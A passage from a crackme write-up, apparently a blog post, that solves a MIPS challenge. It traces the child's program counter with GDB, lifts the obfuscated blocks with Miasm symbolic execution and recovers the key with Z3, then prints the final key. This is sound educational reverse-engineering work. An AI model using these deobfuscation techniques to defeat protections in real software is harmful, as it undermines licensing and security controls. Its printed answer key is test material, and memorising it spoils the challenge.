Tracing is pretty straightforward with GDB using bp and commands. In order to understand the parent's algorithm a bit better, I first wrote a pretty verbose GDB script that prints the loop counter, param variable as well as the original and new child's pc for each iteration. I chose to put two breakpoints:

  • The first one at the end of the first obfuscation blocks (0x401440)
  • The second one before the ptrace call at the end of the second block (0x0401D8C), in order to be able to read the child's pc manipulated by the parent.

Here is the script:

##################################
# A few handy functions
##################################

def print_context_pc
    printf "regs.pc = 0x%08x\n", *(int*)($fp-0x1cc)
end

def print_param
    printf "param = 0x%08x\n", *(int*)($fp-0x2f0)
end

def print_addr
    printf "addr = 0x%08x\n", *(int*)($fp-0x2fc)
end

def print_counter
    printf "counter = %d\n", *(int*)($fp-0x300)
end

##################################

set pagination off
set confirm off
file crackmips
target remote 127.0.0.1:4444 # gdbserver address

# break at the end of block 1
b *0x401440
commands
silent
printf "\nNew round\n"
print_counter
print_context_pc
print_param 
print_addr
c
end

# break before the end of block 2
b *0x0401D8C
commands
silent
print_context_pc
c
end

c

To run that script within GDB, we first need to start crackmips with gdbserver in our qemu VM. After a few minutes, we get the following (cleaned) trace:

New round
counter = 0
regs.pc = 0x0040228c
param = 0x00000000
addr = 0xcd0e9f0e
regs.pc = 0x00402290

New round
counter = 1
regs.pc = 0x004022bc
param = 0x00000000
addr = 0xcd0e99ae
regs.pc = 0x00402ce0

New round
counter = 2
regs.pc = 0x00402d0c
param = 0x00000000
addr = 0xcd0e420e
regs.pc = 0x00402da8

[...]

By reading the trace further, we realize that param is always equal to counter/101. This is actually the child's own loop counter, since its big loop is made of 101 pseudo basic blocks. We also notice that the pc sequence is different for each child's loop: round 0 is not equal to round 101, etc.

Getting a clean trace

Since we're only interested in the final pc value for each round, we can make a simpler script that just outputs those values. And organize them in a parsable format to be able to use them later in another script. Here is the version 2 of the script:

def print_context_pc
    printf "0x%08x\n", *(int*)($fp-0x1cc)
end

set pagination off
set confirm off
file crackmips
target remote 127.0.0.1:4444

# break before the end of block 2
b *0x0401D8C
commands
silent
print_context_pc
c
end

c

The cleaned trace only contains the 606 pc values, one on each line:

0x00402290
0x00402ce0
0x00402da8
0x00403550
[...]
0x004030e4
0x004039dc

Mission 1: accomplished!

Shortcut #2 : Symbolic execution using Miasm

We now have the list of each start address of each basic block executed by the child. The next step is to understand what each one of them does, and reorder them to reproduce the whole algorithm.

Even though writing a symbolic execution engine from scratch is certainly a fun and interesting exercise, I chose to play with Miasm. This excellent framework can disassemble binaries in various architectures (among which x86, x64, ARM, MIPS, etc.), and convert them into an intermediate language called IR (intermediate representation). It is then able to perform symbolic execution on this IR in order to find what are the side effects of a basic block on registers and memory locations. Although there is not so much documentation, Miasm contains various examples that should make the API easier to dig in. Don't tell me that it is hard to install, it is really not (well, I haven't tried on Windows ;). And there is even a docker image, so you have no excuse to not try it!

Miasm symbolic execution 101

Before scripting everything, let's first see how to use Miasm to perform symbolic execution of one basic block. For the sake of simplicity, let's work on the first basic block of the child's main loop.

from miasm2.analysis.machine import Machine
from miasm2.analysis import binary

bi = binary.Container("crackmips")
machine = Machine('mips32l')
mn, dis_engine_cls, ira_cls = machine.mn, machine.dis_engine, machine.ira

First, we open the crackme using the generic Container class. It automatically detects the executable format and uses Elfesteem to parse it. Then we use the handy Machine class to get references to useful classes we'll use to disassemble and analyze the binary.

BB_BEGIN = 0x00402290
BB_END = 0x004022BC

# Disassemble between BB_BEGIN and BB_END
dis_engine = dis_engine_cls(bs=bi.bs)
dis_engine.dont_dis = [BB_END]
bloc = dis_engine.dis_bloc(BB_BEGIN)
print '\n'.join(map(str, bloc.lines))

Here, we disassemble a single basic block, by explicitly telling Miasm its start and end address. The disassembler is created by instantiating the dis_engine_cls class. bi.bs represents the binary stream we are working on. I admit the dont_dis syntax is a bit weird; it is used to tell Miasm to stop disassembling when it reaches a given address. We do it here because the next instruction is a break, and Miasm does not normally think it is the end of a basic block. When you run those lines, you should get this output:

LW         V1, 0x38(FP)
SLL        V0, V1, 0x2
ADDIU      A0, FP, 0x18
ADDU       V0, A0, V0
LW         A0, 0x8(V0)
LW         V0, 0x38(FP)
SUBU       A0, A0, V0
SLL        V0, V1, 0x2
ADDIU      V1, FP, 0x18
ADDU       V0, V1, V0
SW         A0, 0x8(V0)

Okay, so we know how to disassemble a block with Miasm. Let's now see how to convert it into the Intermediate Representation:

# Transform to IR
ira = ira_cls()
irabloc = ira.add_bloc(bloc)[0]
print '\n'.join(map(lambda b: str(b[0]), irabloc.irs))

We instantiated the ira_cls class and called its add_bloc method. It takes a basic block as input and outputs a list of IR basic blocs; here we know that we'll get only one, so we use [0]. Let's see what is the output of those lines:

V1 = @32[(FP+0x38)]
V0 = (V1 << 0x2)
A0 = (FP+0x18)
V0 = (A0+V0)
A0 = @32[(V0+0x8)]
V0 = @32[(FP+0x38)]
A0 = (A0+(- V0))
V0 = (V1 << 0x2)
V1 = (FP+0x18)
V0 = (V1+V0)
@32[(V0+0x8)] = A0
IRDst = loc_00000000004022BC:0x004022bc

Each one of those lines are instructions in Miasm's IR language. It is pretty easy: each instruction is described as a list of side-effects it has on some variables, using expressions and affectations. @32[...] represents a 32-bit memory access; when it's on the left of an = sign, it's a write access, when it's on the right it's a read. The last line uses the pseudo-register IRDst, which is kind of the IR's pc register. It tells Miasm where is located the next basic block.

Great! Let's see now how to perform symbolic execution on this IR basic block.

from miasm2.expression.expression import *
from miasm2.ir.symbexec import symbexec
from miasm2.expression.simplifications import expr_simp

# Prepare symbolic execution
symbols_init = {}
for i, r in enumerate(mn.regs.all_regs_ids):
    symbols_init[r] = mn.regs.all_regs_ids_init[i]

# Perform symbolic exec
sb = symbexec(ira, symbols_init)
sb.emulbloc(irabloc)

mem, exprs = sb.symbols.symbols_mem.items()[0]
print "Memory changed at %s :" % mem
print "\tbefore:", exprs[0]
print "\tafter:", exprs[1]

The first lines are initializing the symbol pool used for symbolic execution. We then use the symbexec module to create an execution engine, and we give it our fresh IR basic block. The result of the execution is readable by browsing the attributes of sb.symbols. Here I am mainly interested on the memory side-effects, so I use symbols_mem.items() to list them. symbols_mem is actually a dict whose keys are the memory locations that changed during execution, and values are pairs containing both the previous value that was in that memory cell, and the new one. There's only one change, and here it is:

Memory changed at (FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20) :
  before: @32[(FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20)]
  after: (@32[(FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20)]+(- @32[(FP_init+0x38)]))

The expressions are getting a bit more complex, but still pretty readable. FP_init represents the value of the fp register at the beginning of execution. We can clearly see that a memory location as modified since a value was subtracted from it. But we can do better: we can give Miasm simplification rules in order to make this output much more readable. Let's do it!

# Simplifications
fp_init = ExprId('FP_init', 32)
zero_init = ExprId('ZERO_init', 32)
e_i_pattern = expr_simp(ExprMem(fp_init + ExprInt32(0x38), 32))
e_i = ExprId('i', 32)
e_pass_i_pattern = expr_simp(ExprMem(fp_init + (e_i << ExprInt32(2)) + ExprInt32(0x20), 32))
e_pass_i = ExprId("pwd[i]", 32)

simplifications = {e_i_pattern      : e_i,
                    e_pass_i_pattern : e_pass_i,
                    zero_init        : ExprInt32(0) }

def my_simplify(expr):
    expr2 = expr.replace_expr(simplifications)
    return expr2

print "%s = %s" % (my_simplify(exprs[0]) ,my_simplify(exprs[1]))

Here we declare 3 replacement rules:

  • Replace @32[(FP_init+0x38)] with i
  • Replace @32[(FP_init+(i << 0x2)+0x20)] with pwd[i]
  • Replace ZERO_init with 0 (although it is not really useful here)

There is actually a more generic way to do it using pattern matching rules with jokers, but we don't really need this machinery here. This the result we get after simplification:

pwd[i] = (pwd[i]+(- i))

That's all! So all this basic block does is a subtraction. What is nice is that the output is actually valid Python code :). This will be very useful in the last part.

Generating the child's algorithm

So in less than 60 lines, we were able to disassemble an arbitrary basic block, perform symbolic execution on it and get a pretty understandable result. We just need to apply this logic to the 100 remaining blocks, and we'll have a pythonic version of each one of them. Then, we simply reorder them using the GDB trace we got from the previous part, and we'll be able to generate 606 python lines describing the whole algorithm.

Here is an extract of the script automating all of this:

def load_trace(filename):
    return [int(x.strip(), 16) for x in open(filename).readlines()]

def boundaries_from_trace(trace):
    bb_starts = sorted(set(trace))
    boundaries = [(bb_starts[i], bb_starts[i+1]-4) for i in range(len(bb_starts)-1)]
    boundaries.append((0x4039DC, 0x04039E8)) # last basic bloc, added by hand
    return boundaries

def exprs2str(exprs):
    return ' = '.join(str(e) for e in exprs)

trace = load_trace("gdb_trace.txt")
boundaries = boundaries_from_trace(trace)

print "# Building IR blocs & expressions for all basic blocks"
bb_exprs = []
for zone in boundaries:
    bb_exprs.append(analyse_bb(*zone))

print "# Reconstructing the whole algorithm based on GDB trace"
bb_starts = [x[0] for x in boundaries]
for bb_ea in trace:
    bb_index = bb_starts.index(bb_ea)
    #print "%x : %s" % (bb_ea, exprs2str(bb_exprs[bb_index]))
    print exprs2str(bb_exprs[bb_index])

The analyse_bb() function perform symbolic execution on a single basic block, given its start and end addresses. This is just wrapping what we've been doing so far into a function. The GDB trace is opened, parsed, and a list of basic block addresses is built from it (we cheat a little bit for the last one of the loop, by hardcoding it). Each basic block is analyzed and the resulting expressions are pushed into the bb_exprs list. Then the GDB trace is processed, by outputting the expressions corresponding to each basic block.

This is what we get:

# Building IR blocs & expressions for all basic blocks
# Reconstructing the whole algorithm based on GDB trace
pwd[i] = (pwd[i]+(- i))
pwd[i] = ((0x0|pwd[i])^0xFFFFFFFF)
pwd[i] = (pwd[i]^i)
pwd[i] = (pwd[i]^i)
pwd[i] = (pwd[i]+0x3ECA6F23)
pwd[i] = (pwd[i]+0x6EDC032)
[...]
pwd[i] = ((pwd[i] << 0x14)|(pwd[i] >> 0xC))
pwd[i] = ((pwd[i] << ((i+0x1)&0x1F))|(pwd[i] >> ((((0x0|i)^0xFFFFFFFF)+0x20)&0x1F)))
i = (i+0x1)

Solving with Z3

Okay, so now we have a Python (and even C ;) file describing the operations performed on the 6 dwords containing the input key. We could try to bruteforce it, but using a constraint solver is much more elegant and faster. I also chose Z3 because it has nice Python bindings. And since its expression syntax is mostly compatible with Python, we just need to add a few things to our generated file!

from z3 import *
import struct

solution_str = "[ Synacktiv + NSC = <3 ]"
solutions = struct.unpack("<LLLLLL", solution_str)
N = len(solutions)

# Hook Z3's `>>` so it works with our algorithm
# (logical shift instead of arithmetic one)
BitVecRef.__rshift__  = LShR

pwd = [BitVec("pwd_%d" % i, 32) for i in range(N)]
pwd_orig = [pwd[i] for i in range(N)]
i = 0

# paste here all the generated algorithm from previous part
# BEGIN ALGO
pwd[i] = (pwd[i]+(- i))
pwd[i] = ((0x0|pwd[i])^0xFFFFFFFF)
# [...]
pwd[i] = ((pwd[i] << ((i+0x1)&0x1F))|(pwd[i] >> ((((0x0|i)^0xFFFFFFFF)+0x20)&0x1F)))
i = (i+0x1)
# END ALGO

s = Solver()

for i in range(N):
    s.add(pwd[i] == solutions[i])

assert s.check() == sat

m = s.model()
sol_dw = [m[pwd_orig[i]].as_long() for i in range(N)]
key = ''.join(("%08x" % dw)[::-1].upper() for dw in sol_dw)

print "KEY = %s" % key

We've declared the valid solution, the list of 6 32-bit variables (pwd), pasted the algorithm, and ran the solver. We just need to be careful with the >> operation, since Z3 treats it as an arithmetic shift, and we want a logical one. So we replace it with a dirty hook.

The solution should come almost instantly:

$ python sample_solver.py
KEY = 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC

Alternative solution - conclusion

I chose this solution not only to get acquainted with Miasm, but also because it required much less effort and pain :). It fits into approximately 20 lines of GDB script, and 120 of python using Miasm and Z3. You can find all of those in this folder. I hope it gave you an understandable example of symbolic execution and what you can do with it. However I strongly encourage you to dig into Miasm's code and examples if you want to really understand what's going on under the hood.

War's over, the final words

I guess this is where I thank both @elvanderb for this really cool challenge and @synacktiv for letting him write it :-). Emilien and I also hope you enjoyed the read, feel free to contact any of us if you have any remarks/questions/whatever.

Also, special thanks to @__x86 and @jonathansalwan for proofreading!

The codes/traces/tools developed in this post are all available on github here and here!

By the way, don't hesitate to contact a member of the staff if you have a cool post you would like to see here -- you too can end up in doar-e's wall of fame :-).

❌
❌